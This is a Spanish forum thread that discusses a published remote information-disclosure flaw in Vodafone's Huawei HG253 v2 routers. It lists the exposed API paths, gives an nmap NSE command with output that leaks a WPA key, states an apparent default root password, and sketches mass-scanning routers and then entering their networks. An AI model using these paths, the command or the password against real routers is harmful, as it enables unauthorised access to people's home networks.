Brecha severa en los nuevos routers "fibra" Vodafone (Huawei HG253 v2) (Pagina 1) / Huawei / Foro Wifi-libre.com

El libre pensamiento para un internet libre

No estas registrado.     

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

#1 27-11-2015 19:16:06

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,069

Brecha severa en los nuevos routers "fibra" Vodafone (Huawei HG253 v2)

Brecha en el nuevo punto de acceso Huawei HG253 v2 puesto en servicio por Vodafone para sus lineas de fibra óptica :
¡ Es posible acceder a información critica remotamente sin tener los credenciales para ello!  ("information disclosure")

vod_1.png

  No he tenido entre manos uno de estos "routers" pero si que he visto aparecer en los aires eSSID de vodafone con direcciones mac de Huawei.
Un forma de distinguir los de sus predecesores (los HG566a - vulnerables pixiedust y WPSPIN ) es observando la diferencia entre el eSSID y el bSSID

voda_2.jpg

Otra manera es echando un ojo a los PROBES en el apartado WPS
Los "viejos" HG56a llevan un chipset Ralink.
Los "nuevos"  HG253 v2 llevan esta vez un chipset Broadcom

voda_3.jpg

  El HG 253 v2 se parece muchísimo al HG566a : Es una "box" dónde el diseño prima sobre la eficiencia (ausencia de antenas externas, una tremenda estupidez). 

voda_4.jpg

  Un link de mucho interés :

  Conclusión : Las cosas no cambian con el paso de los años.
Vodafone sigue produciendo unos firmwares tremendamente restrictivos y con un nivel de seguridad pésimo.

  Centrémonos un rato sobre la brecha de seguridad publicada hoy por Vicen Dominguez en PacketStorm :

La Gula es pecado...
Y el HG 253s se come cualquier galleta

La brecha se explota de forma remota.
Es decir desde cualquier punto del globo utilizando la IP publica de los routers que tienen puertos abiertos hacía el exterior.
En este caso se usan los puertos 80 (http) y 443 (https?)
La brecha se debe a que varias paginas de la interfaz de configuración del routers tienen un bug a nivel de los certificados de autenticidad de los coockies.
Más que un bug es un falló completo : validan cualquier cosa y el router se "come" cualquier coockie
Estas son las paginas que podemos "bypassear" :

http://IPhtml_253s/api/ntwk/WlanBasic
http://IP/html_253s/api/system/diagnose_internet
http://IP/html_253s/api/system/hostinfo?type=ethhost
http://IP/html_253s/api/system/hostinfo?type=guesthost
http://IP/html_253s/api/system/hostinfo?type=homehost
http://IP/html_253s/api/system/hostinfo?type=wifihost
http://IP/html_253s/api/system/wizardcfg

Podemos así llegar sin problemas en estas paginas de la interfaz del objetivo y obtener información confidencial:

El autor lo hace con nmap y un script casero ("hua253s.nse"; compartido en github)

nmap --script=http-enum-vodafone-hua253s.nse -p80,443 -sS x.x.x.x

Y recopila así información critica como la llave WPA de la red WiFi

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-vodafone-hua253s:
|   SSID: vodafone070 (14:b9:XX:XX:XX:XX) Password: (AES) 123456
|   Device: android-246e67b281179679-Wireless MAC: 48:5A:3F:XX:XX:XX IP:
192.168.0.XX

  Es una brecha muy severa.
Se puede fácilmente lanzar un escaneo masivo y recopilar llaves WPA asociadas con una IP y un bSSID.
Luego se hace un poco de localización por IP...
...Y solo hace falta tener una bicicleta y un portátil para ir a entrometerse en todas las redes vodafone recopiladas en un barrio.

  La pregunta a mil €uros es si los puertos están abiertos sobre el exterior por defecto.
Si es así... Es un gran cagada porque sabemos que muy [email protected] [email protected] han ido a modificar los parámetros en su interfaz de configuración.

  Segunda pregunta, de menos importancia, es saber si se puede cambiar estos parámetros con la cuenta de usuario (ya que vodafone no da a sus usuarios los credenciales root pero los credenciales de user).
  Si no se puede esto hará que mas usuarios queden desprotegidos...
La contraseña root parece ser VF-EShg253

  El script es disponible en la rama github de DaniLabs :
scripts-nse/http-enum-vodafone-hua253s.nse

  Hablare en toro tema de esta rama github de DaniLabs ya que aloja un par de scripts muy interesantes que explotan brechas similares en routers puestos en marcha por Telefónica...

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#2 27-11-2015 22:36:31

mak074
Very Important Usuario

Registrado: 29-03-2015
Mensajes: 14

Re: Brecha severa en los nuevos routers "fibra" Vodafone (Huawei HG253 v2)

Hola crack..

Muy buen post...esperando que hables sobre los scripts de telefonica..

Un saludo..

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

Pie de página

Información del usuario

Ultimo usuario registrado: evam
Usuarios registrados conectados: 0
Invitados conectados: 4

Estadisticas de los foros

Número total de usuarios registrados: 357
Número total de temas: 621
Número total de mensajes: 4,272

Máx. usuarios conectados: 45 el 12-04-2016 12:02:20